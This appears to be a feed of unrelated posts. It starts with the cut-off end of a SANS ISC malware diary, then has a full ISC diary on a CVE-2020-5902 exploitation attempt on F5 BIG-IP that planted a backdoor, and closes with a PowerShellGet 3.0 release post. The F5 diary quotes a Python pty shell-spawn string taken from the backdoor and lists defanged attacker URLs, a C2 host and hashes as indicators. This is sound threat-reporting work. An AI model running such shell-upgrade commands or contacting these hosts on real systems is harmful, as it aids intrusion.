The third payload is a Zip file (a JAR file) that contains a classic AdWind backdoor (SHA256: 3c4e2ca8a7b7cd1eb7ff43851d19a456914f0e0307dfe259813172e955d7f2ab)[2].

[1] http://for610.com
[2] https://www.virustotal.com/gui/file/3c4e2ca8a7b7cd1eb7ff43851d19a456914f0e0307dfe259813172e955d7f2ab/detection

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

F5 BigIP vulnerability exploitation followed by a backdoor implant attempt, (Tue, Jul 7th)

While monitoring SANS Internet Storm Center’s honeypots today, I came across the second F5 BIG-IP CVE-2020-5902 vulnerability exploitation followed by a backdoor deployment attempt. The first one was seen by Johannes yesterday [1].

Running the backdoor binary (an ELF executable) on a separate system, I was able to verify that it establishes an SSL connection to the address web[.]vpnkerio.com (52[.]32.180.34:443).

Looking up web[.]vpnkerio.com on VirusTotal while writing this diary, I could find no AV engine flagging the network addresses or the binary hash as malicious.

For persistence, it writes a line to the “/etc/init.d/rc.local” file in an attempt to start on system boot.

Examining the binary statically, it is possible to see the string python -c 'import pty;pty.spawn("/bin/sh")'. It will require more analysis, but this is likely used by the attacker to get an interactive terminal on the target system. A proper terminal is usually required for the attacker to run commands like ‘su’.

IOCs:

Exploitation attempt source
96[.]45.187.52

Backdoor URL:
http://104[.]238.140.239:8080/123

C2 communication
web[.]vpnkerio.com
52[.]32.180.34:443

The backdoor binary
90ce1320bd999c17abdf8975c92b08f7 (MD5)
a8acda5ddfc25e09e77bb6da87bfa157f204d38cf403e890d9608535c29870a0  (SHA256)

References

[1] https://isc.sans.edu/forums/diary/Summary+of+CVE20205902+F5+BIGIP+RCE+Vulnerability+Exploits/26316/


Renato Marinho
Morphus Labs | LinkedIn | Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

PowerShellGet 3.0 Preview 6 Release

Since our last blog post, we have released two preview versions (previews 4 and 6) of the PowerShellGet 3.0 module. These releases introduced publish functionality and repository wildcard search, and fixed error handling when a repository is not accessible in Find-PSResource. Note that preview 5 was unlisted due to a packaging error discovered post-publish.

To install the latest version of the module, open any PowerShell console and run:

Install-Module PowerShellGet -Force -AllowPrerelease -Repository PSGallery

Highlights of the releases

Preview 4 (3.0.0-beta4) Highlights

New Feature

Wildcard search for the -Repository parameter in Find-PSResource. This allows the user to return results from all registered PSRepositories instead of just their highest-priority repository. To use this feature, add -Repository '*' to your call to Find-PSResource.

Bug Fix

Fixed poor error handling for when a repository is not accessible in Find-PSResource.

Preview 6 (3.0.0-beta6) Highlight

New Feature

The Publish-PSResource cmdlet was introduced, which allows users to publish PowerShell resources to any registered PSRepository (usage is along the lines of Publish-PSResource -Path ./MyModule -Repository MyRepo).

What’s next

We have 3 planned upcoming releases for the module:

  • The Preview 7 release will focus on update functionality, along with several bug fixes that have been reported by users through our preview releases.
  • The Release Candidate (RC) release will resolve any remaining bugs not resolved in our Preview 6 release.
  • The 3.0 General Availability (GA) release will be the same as the RC version so long as no blocking or high-risk bugs are found in the release candidate. If there are any blocking or high-risk bugs, we will release another release candidate before GA.

Migration to PowerShellGet 3.0

We hope to ship the latest preview of PowerShellGet 3.0 in the next preview of PowerShell 7.1 (preview 6). The goal for this version of PowerShellGet, which will ship in PowerShell 7.1 preview 6, is to contain a compatibility module that will enable scripts using PowerShellGet 2.x cmdlets (e.g. Install-Module) to be run using the PowerShellGet 3.0 module. This means that users will likely not need to update their scripts in order to keep using PowerShellGet 2.x cmdlets with PowerShell 7.1. It is important to note, as well, that on systems which contain any other version of PowerShell, the PowerShellGet 2.x module will still be available and used.

We hope to ship PowerShellGet 3.0 with a compatibility layer into PowerShell 7.1 as the sole version of PowerShellGet in the package. However, we will only do this if we reach GA, with a high bar for release quality, in time for the PowerShell 7.1 release candidate.

How to get support and give feedback

We cannot overstate how critical user feedback is at this stage in the development of the module. Feedback from preview releases helps inform design decisions without incurring breaking changes once the module is generally available and used in production. To help us make key decisions around the behavior of the module, please give us feedback by opening issues in our GitHub repository.

Sydney Smith, PowerShell Team
